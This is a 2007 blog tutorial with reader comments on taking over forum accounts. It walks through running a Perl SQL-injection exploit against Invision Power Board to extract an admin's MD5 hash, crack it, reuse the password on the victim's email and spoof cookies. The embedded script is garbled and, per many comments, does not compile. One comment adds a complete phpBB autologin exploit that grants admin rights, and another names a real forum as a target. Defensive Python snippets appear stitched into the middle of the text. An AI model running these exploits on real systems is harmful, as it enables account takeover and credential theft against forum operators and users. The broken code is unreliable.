Disclaimer

These articles are intended for IT Professionals and systems administrators with experience servicing computer hardware. Please do not attempt any of these procedures if you are unfamiliar with computer hardware, and please use this information responsibly. We are not responsible for the use or misuse of this material, including loss of data, damage to hardware, or personal injury.

How to Hack into Forums  



Friday, November 16, 2007
Learn How To Hack

This is what you like to call "Hacking a forum".

I call it "Cracking into a forum" ... Learn what hacking means you lazy fucks, lol...

PS: I am hacking a forum slowly; everything I am doing now is posted here in steps:

First of all, what you need is a forum to hack. For the sake of this tutorial, and for the safety of a specific site, I will not release the URL of the site that I will be hacking in this. I will be referring to it as "hackingsite".



So you've got your target. You know the forum you want to hack, but how? Let's find the user we want to hack. Typically, you'd want to hack the admin. The administrator is usually the first member, therefore his/her User ID will be "1". Find the User ID of the administrator, or person you wish to hack. For this tutorial, let's say his/her ID is "2".

Got it? Well, now we are almost all set. So far, we know the site we wish to hack, and the member we wish to hack. In this case, we are hacking the administrator of "hackingsite", which is User ID "2".

Now we need a nice exploit. For 1.3.1 forums, I prefer to use one that is in common circulation around these forums. For those who don't have it, here:


CODE
#!/usr/bin/perl -w
##################################################################
# This one actually works :) Just paste the outputted cookie into
# your request header using livehttpheaders or something and you
# will probably be logged in as that user. No need to decrypt it!
# Exploit coded by "ReMuSOMeGa & Nova" and http://remusomega.com
##################################################################

use LWP::UserAgent;

$ua = new LWP::UserAgent;
$ua->agent("Mosiac 1.0" . $ua->agent);

if (!$ARGV[0]) {$ARGV[0] = '';}
if (!$ARGV[3]) {$ARGV[3] = '';}

my $path = $ARGV[0] . '/index.php?act=Login&CODE=autologin';
my $user = $ARGV[1]; # userid to jack
my $iver = $ARGV[2]; # version 1 or 2
my $cpre = $ARGV[3]; # cookie prefix
my $dbug = $ARGV[4]; # debug?

if (!$ARGV[2])
{
print "..By ReMuSoMeGa & Nova. Usage: ipb.pl http://forums.site.org [id] [ver 1/2].\n\n";
exit;
}

my @charset = ("0","1","2","3","4","5","6","7","8","9","a","b","c","d","e","f");

my $outputs = '';

for( $i=1; $i < j="0;" current =" $charset[$j];" sql =" (" cookie =" ('Cookie'"> $cpre . "member_id=31337420; " . $cpre . "pass_hash=" . $sql);
my $res = $ua->get($path, @cookie);

# If we get a valid sql request then this
# does not appear anywhere in the sources
$pattern = '';

$_ = $res->content;

if ($dbug) { print };

if ( !(/$pattern/) )
{
$outputs .= $current;
print "$current\n";
last;
}

}
if ( length($outputs) < member_id=" . $user . " pass_hash="">


What the fuck, pretty confused, aren't you? What the fuck are you supposed to do with this shit?! I'll tell you. First of all, this is a Perl script. Copy and paste that code into Notepad.

How can you execute Perl scripts? Well, you can upload them to your CGI-BIN, or you can take my route of preference, and install Perl on your PC.

You're going to want to go and get ActivePerl. I am sure it's here somewhere in Appz.

Open the file up, and let it install. Leave everything on default. In other words, just keep hitting "OK".

So now you have Perl installed. Open up "My Computer", and then click on "Local Disk (C:/)". In there, you should see a folder named "Perl". Open up that folder, and within "Perl", you should see another folder named "bin". Open up "bin". Now that you're in, drag and drop "ipb.pl" from your desktop into "bin".


Alrighty. Now everything is fine, and you're ready to Pwn some FAGS ...

What you're going to want to do now is open up your command prompt. If you don't know how, please quit this site, and die.... Start - Run - CMD

Alright, so now you're in your command prompt. You want to change the directory in your command prompt to your Perl/bin directory. To do this, type the following into your command prompt, and hit enter:

cd C:\Perl\bin


Good job. You're very, very close to being finished. Now that you are in the Perl/bin directory, we need to access the ipb.pl file. How do we do this? Type the following command into your command prompt:

perl ipb.pl


So, this is what we need to do. Type the following command into your command prompt:

ipb.pl http://hackingsite.com/forum 2 1

Obviously replace "http://hackingsite.com/forum" with the URL to the forum you wish to hack.

Now, this may take a minute. The exploit is gathering information, and grabbing the hash. Numbers/letters will slowly appear down the screen. Don't be alarmed, and allow the program a few minutes. Once the hash grabbing is complete, it will return a full hash, as well as User ID.
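
From the forum operator's side, the behaviour described here is noisy: the script hits the autologin URL once per guessed hex character, with a fixed User-Agent prefix and a fixed member_id cookie. The following is an added example, not part of the original post, that scans request logs for those traits; the tab-separated log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample log (not real traffic). Assumed format, tab-separated:
# client IP, request line, User-Agent, Cookie header.
AUTOLOGIN = "GET /forum/index.php?act=Login&CODE=autologin HTTP/1.0"
SAMPLE_LOG = [
    "\t".join(["192.0.2.10", AUTOLOGIN, "Mosiac 1.0libwww-perl/5.805",
               "member_id=31337420; pass_hash=not-a-hash'"])
] * 3 + [
    "\t".join(["198.51.100.7", AUTOLOGIN, "Mozilla/4.0 (compatible)",
               "member_id=5; pass_hash=0123456789abcdef0123456789abcdef"]),
    "\t".join(["198.51.100.7", "GET /forum/index.php?showtopic=1 HTTP/1.0",
               "Mozilla/4.0 (compatible)", ""]),
]

HEX32 = re.compile(r"^[0-9a-f]{32}$")

def parse_cookie(header):
    """Split a Cookie header into a name -> value dict."""
    pairs = (item.strip().partition("=") for item in header.split(";"))
    return {name: value for name, _, value in pairs if name}

def scan(lines, burst_threshold=3):
    """Return {client_ip: sorted list of findings} for autologin requests."""
    findings, counts = defaultdict(set), defaultdict(int)
    for line in lines:
        fields = line.rstrip("\n").split("\t")
        if len(fields) != 4:
            continue
        ip, request, agent, cookie = fields
        if "act=Login" not in request or "CODE=autologin" not in request:
            continue
        counts[ip] += 1
        if agent.startswith("Mosiac 1.0"):      # UA prefix set by the script
            findings[ip].add("script_user_agent")
        for name, value in parse_cookie(cookie).items():
            # Cookie names may carry a board-specific prefix, so match suffixes.
            if name.endswith("pass_hash") and not HEX32.match(value):
                findings[ip].add("malformed_pass_hash")
            if name.endswith("member_id") and value == "31337420":
                findings[ip].add("script_member_id")
    for ip, n in counts.items():
        if n >= burst_threshold:                # one request per guessed character
            findings[ip].add("autologin_burst")
    return {ip: sorted(tags) for ip, tags in findings.items()}
```

The malformed_pass_hash check is the one that survives a change of User-Agent or member_id: a legitimate autologin cookie only ever carries 32 hex characters, so the same test belongs in the application as input validation before the value reaches a query.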

Now you have the hash. In our case, the hash is: 4114d9d3061dd2a41d2c64f4d2bb1a7f

But what can we do with this hash? To you, it just looks like a scramble of numbers and letters. What this is, is an MD5 hash. This is the person's password, hashed using the MD5 algorithm. I urge you to do a quick read-up on MD5 hashes before continuing reading.

Done? You understand the very basics of MD5s? Good. You're probably thinking: I just read that MD5 hashes cannot be cracked!

LOL.. Indeed, MD5s are impossible to reverse. Once a string is MD5ed, there is no way to get it back to plain-text. It is IMPOSSIBLE to decrypt an MD5 hash. But.. It is NOT impossible to CRACK an MD5 hash.

There are many places online where you can enter hashes to be cracked. Personally, I use "Cain & Abel", which is a great MD5 cracker available at 'http://odix.it'.

You can use any method, and any crackers to crack this hash. 90% of the hashes I get, I am able to crack. Once you crack the hash, you will be given a plain-text password.
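
A crack rate that high follows from the storage format: a bare MD5 has no salt and is very fast to compute, so equal passwords give equal hashes and common ones can be looked up. The following is an added example, not part of the original post, showing how a forum operator can wrap the existing MD5 column in a salted, slow key-derivation function without knowing any password; the function names, the iteration count and the sample table are assumptions.

```python
import hashlib
import hmac
import os

ITERATIONS = 600_000  # assumed work factor; tune to your hardware

def legacy_md5(password):
    """The storage format discussed above: bare, unsalted MD5 hex."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()

def upgrade_record(md5_hex):
    """Wrap an existing MD5 hex digest without knowing the password."""
    salt = os.urandom(16)  # per-member salt defeats precomputed lookups
    key = hashlib.pbkdf2_hmac("sha256", md5_hex.encode("ascii"), salt, ITERATIONS)
    return {"scheme": "pbkdf2-sha256(md5)", "salt": salt.hex(), "hash": key.hex()}

def verify(password, record):
    """Recompute MD5 then PBKDF2 and compare in constant time."""
    salt = bytes.fromhex(record["salt"])
    key = hashlib.pbkdf2_hmac("sha256", legacy_md5(password).encode("ascii"),
                              salt, ITERATIONS)
    return hmac.compare_digest(key.hex(), record["hash"])

def migrate(members):
    """Replace every legacy MD5 column value with a wrapped record."""
    return {name: upgrade_record(md5_hex) for name, md5_hex in members.items()}

# Constructed sample table: two members who chose the same password.
LEGACY_TABLE = {"alice": legacy_md5("sunshine1"), "bob": legacy_md5("sunshine1")}
```

After migration the two members no longer share a stored value. On each member's next successful login, rehash the plaintext password directly so the MD5 layer can be dropped.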

CONGRATS! You now have the victim's password! You can now login to his/her account on whatever forum you were hacking. Hell, you could even try that password on his/her e-mail or MSN/AIM account. SureFire bro, fuck them up

But what if the hash is not crackable? You are merely left with a password hash. What can you do with this?

Well, you can spoof your cookie!

If you would like to learn more on spoofing cookies, use the friendly searching site they call "GOOGLE"
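
Cookie spoofing is possible here because the autologin cookie carries the stored pass_hash itself, which makes the database value as good as the password. The following is an added example, not part of the original post, of the alternative design: a random autologin token in the cookie and only its digest on the server, so a leaked table row cannot be replayed. The class name, field layout and lifetime are assumptions.

```python
import hashlib
import hmac
import secrets
import time

class AutoLoginStore:
    """Server-side table of autologin tokens; stores digests, never tokens."""

    def __init__(self, ttl_seconds=30 * 24 * 3600):
        self.ttl = ttl_seconds
        self.rows = {}  # member_id -> (sha256 hex of token, expiry timestamp)

    @staticmethod
    def _digest(token):
        return hashlib.sha256(token.encode("ascii", "replace")).hexdigest()

    def issue(self, member_id, now=None):
        """Create a fresh token for the cookie; it is unrelated to the password."""
        now = time.time() if now is None else now
        token = secrets.token_urlsafe(32)
        self.rows[member_id] = (self._digest(token), now + self.ttl)
        return token

    def check(self, member_id, token, now=None):
        """Accept only an unexpired token whose digest matches the stored row."""
        now = time.time() if now is None else now
        row = self.rows.get(member_id)
        if row is None or now > row[1]:
            return False
        return hmac.compare_digest(self._digest(token), row[0])

    def revoke(self, member_id):
        """Call on logout and on every password change."""
        self.rows.pop(member_id, None)
```

Because the server stores a digest of a high-entropy random value, reading the table gives nothing that can be sent back as a cookie, and revoking on password change ends any session already issued.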


Good luck!





20 comments: to “ How to Hack into Forums

  • Anonymous
    December 21, 2007 at 3:16 AM  

    I cannot seem to get it to work. I have done everything you say to do, and I am still doing something wrong. Every time I get to the very end, where I put the URL address in the command prompt, I just get the exploit given above. Help here please.

  • otep_love
    January 22, 2008 at 6:44 PM  

    dude the perl script isn't working.....
    execution of ipb.pl aborted due to compilation errors.. I dunno perl script,or i wud hav set it rite.... :-[

  • Anonymous
    July 9, 2008 at 8:08 AM  

    Question... I am stuck at the first command prompt step. As I enter 'cd C:\Perl\bin' it gives an error stating 'The system cannot find the patch specified'

    any ideas on fixing this?

  • Anonymous
    July 18, 2008 at 4:46 PM  

    After it installs I can't find the ipb.pl anywhere on my desktop. What's wrong?

  • Anonymous
    July 23, 2008 at 8:58 AM  

    I tried compiling the script with ActivePerl-5.8.8.822-MSWin32-x86-280952 but ended up with some errors. Will I need an older version to compile this? Please tell me the exact version this script is for.

  • Jimmi.
    August 1, 2008 at 12:42 AM  

    Once you copy and paste that on to Notepad [note don't copy CODE copy everything below that, is the actual code] you save it as ipb.pl to your Desktop for easy access. Too bad I don't know Perl so I could fix the fucking code.

  • Anonymous
    August 3, 2008 at 11:34 AM  

    "ipb.pl execution was aborted due to compilation errors"

    omfg.... HELP?

  • Anonymous
    August 3, 2008 at 6:17 PM  

    im getting same error "ipb.pl execution was aborted due to complition errors"

  • Anonymous
    August 5, 2008 at 2:32 PM  

    Hey, I copied everything under the "code" and when I try to perl it, it doesn't work, it gives me an error!

    can someone get a descriptive detail?

  • Anonymous
    August 11, 2008 at 9:55 PM  

    Man... you need to teach something easier than this...
    vampireturns@yahoo.com

  • ram
    August 16, 2008 at 8:53 PM  

    hey i have to install unix os.
    I am confused.
    please change this tutorial in a format that we understood.

  • Anonymous
    August 24, 2008 at 3:48 PM  

    You guys get the note "compilation error" because the script is full of errors. It's probably like this so you guys don't do anything illegal with it. Find your own working exploits...

  • Anonymous
    September 12, 2008 at 8:39 AM  

    cool thanks

  • Anonymous
    September 16, 2008 at 2:49 AM  

    This doesn't work. I am stuck at
    "Good job. Your very, very close to being finished. Now that you are in the Perl/bin directory, we need to access the ipb.pl file. How do we do this? Type the following command into your command prompt:

    perl ipb.pl"
    This always gives me an error

  • Anonymous
    December 12, 2008 at 4:34 AM  

    If you can't sort this basic error out then I'm not going to bother telling you people. If you're this stupid then you don't deserve to have it work.

  • Anonymous
    December 28, 2008 at 11:27 AM  

    Here is Perl code appropriate for hacking:


    #!/usr/bin/perl -w

    # phpBB <=2.0.12 session autologin exploit
    # This script uses the vulnerability in autologinid variable
    # More: http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=267563
    #
    # Just gives an user on vulnerable forum administrator rights.
    # You should register the user before using this ;-)

    # by Kutas, kutas@mail15.com
    #P.S. I dont know who had made an original exploit, so I cannot place no (c) here...
    # but greets goes to Paisterist who made an exploit for Firefox cookies...

    if (@ARGV < 3)
    {
    print q(
    +++++++++++++++++++++++++++++++++++++++++++++++++++
    Usage: perl nenu.pl [site] [phpbb folder] [username] [proxy (optional)]
    i.e. perl nenu.pl www.site.com /forum/ BigAdmin 127.0.0.1:3128
    ++++++++++++++++++++++++++++++++++++++++++++++++++++
    );
    exit;
    }
    use strict;
    use LWP::UserAgent;

    my $host = $ARGV[0];
    my $path = $ARGV[1];
    my $user = $ARGV[2];
    my $proxy = $ARGV[3];
    my $request = "http://";
    $request .= $host;
    $request .= $path;


    use HTTP::Cookies;
    my $browser = LWP::UserAgent->new ();
    my $cookie_jar = HTTP::Cookies->new( );
    $browser->cookie_jar( $cookie_jar );
    $cookie_jar->set_cookie( "0","phpbb2mysql_data", "a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D", "/",$host,,,,,);
    if ( defined $proxy) {
    $proxy =~ s/(http:\/\/)//eg;
    $browser->proxy("http" , "http://$proxy");
    }
    print "++++++++++++++++++++++++++++++++++++\n";
    print "Trying to connect to $host$path"; if ($proxy) {print "using proxy $proxy";}

    my $response = $browser->get($request);
    die "Error: ", $response->status_line
    unless $response->is_success;

    if($response->content =~ m/phpbbprivmsg/) {
    print "\n Forum is vulnerable!!!\n";
    } else {
    print "Sorry... Not vulnerable"; exit();}

    print "+++++++++++++++++++++++++++++\nTrying to get the user:$user ID...\n";
    $response->content =~ /sid=([\w\d]*)/;
    my $sid = $1;

    $request .= "admin\/admin_ug_auth.php?mode=user&sid=$sid";
    $response = $browser->post(
    $request,
    [
    'username' => $user,
    'mode' => 'edit',
    'mode' => 'user',
    'submituser' => 'Look+up+User'
    ],
    );
    die "Error: ", $response->status_line
    unless $response->is_success;

    if ($response->content =~ /name="u" value="([\d]*)"/)
    {print " Done... ID=$1\n++++++++++++++++++++++++++++++\n";}
    else {print "No user $user found..."; exit(); }
    my $uid = $1;
    print "Trying to give user:$user admin status...\n";

    $response = $browser->post(
    $request,
    [
    'userlevel' => 'admin',
    'mode' => 'user',
    'adv'=>'',
    'u'=> $uid,
    'submit'=> 'Submit'
    ],
    );
    die "Error: ", $response->status_line
    unless $response->is_success;
    print " Well done!!! $user should now have an admin status..\n++++++++++++++++++++++++++++";

    # milw0rm.com [2005-03-21]

  • Enigma
    January 7, 2009 at 10:07 AM  

    I get a paragraph of text saying, along with many other things, that "execution of ipb.pl aborted due to complication errors" after I enter "perl ipb.pl". Some help would be appreciated.

  • Anonymous
    March 3, 2009 at 10:02 PM  

    I have a URL to post for some of your more experienced hacks to have some fun with, they are deleting common folks posts left and right, the forum admin has run amuck with her authority, as its a small town newspaper forum. I can't get the perl thing to work, so I am asking for your assistance, pretty pretty plesee

    http://www.ozarkregionalonline.com/forums/forumdisplay.php?f=3

  • Very anonymous
    March 25, 2009 at 2:42 AM  

    "Aborted due to compilation errors."
    Can someone who got this to work (If anyone) post how? Or if the one who made this article/blog/faq/tutorial/guide/fucked-up-article/blog/faq/tutorial/guide is reading this, YOU. THIS CODE: use LWP::UserAgent;

    $ua = new LWP::UserAgent;
    $ua->agent("Mosiac 1.0" . $ua->agent);

    if (!$ARGV[0]) {$ARGV[0] = '';}
    if (!$ARGV[3]) {$ARGV[3] = '';}

    my $path = $ARGV[0] . '/index.php?act=Login&CODE=autologin';
    my $user = $ARGV[1]; # userid to jack
    my $iver = $ARGV[2]; # version 1 or 2
    my $cpre = $ARGV[3]; # cookie prefix
    my $dbug = $ARGV[4]; # debug?

    if (!$ARGV[2])
    {
    print "..By ReMuSoMeGa & Nova. Usage: ipb.pl http://forums.site.org [id] [ver 1/2].\n\n";
    exit;
    }

    my @charset = ("0","1","2","3","4","5","6","7","8","9","a","b","c","d","e","f");

    my $outputs = '';

    for( $i=1; $i < j="0;" current =" $charset[$j];" sql =" (" cookie =" ('Cookie'"> $cpre . "member_id=31337420; " . $cpre . "pass_hash=" . $sql);
    my $res = $ua->get($path, @cookie);

    # If we get a valid sql request then this
    # does not appear anywhere in the sources
    $pattern = '';

    $_ = $res->content;

    if ($dbug) { print };

    if ( !(/$pattern/) )
    {
    $outputs .= $current;
    print "$current\n";
    last;
    }

    }
    if ( length($outputs) < member_id=" . $user . " pass_hash="">. MY GRAMMAR. FIX. NOW.

    (For anyone that's confused, the ipb.pl is the (Probably-not-yet-saved) notepad file.)

  • David
    April 21, 2009 at 8:12 PM  

    execution of ipb.pl aborted due to compilation errors.. ....

 
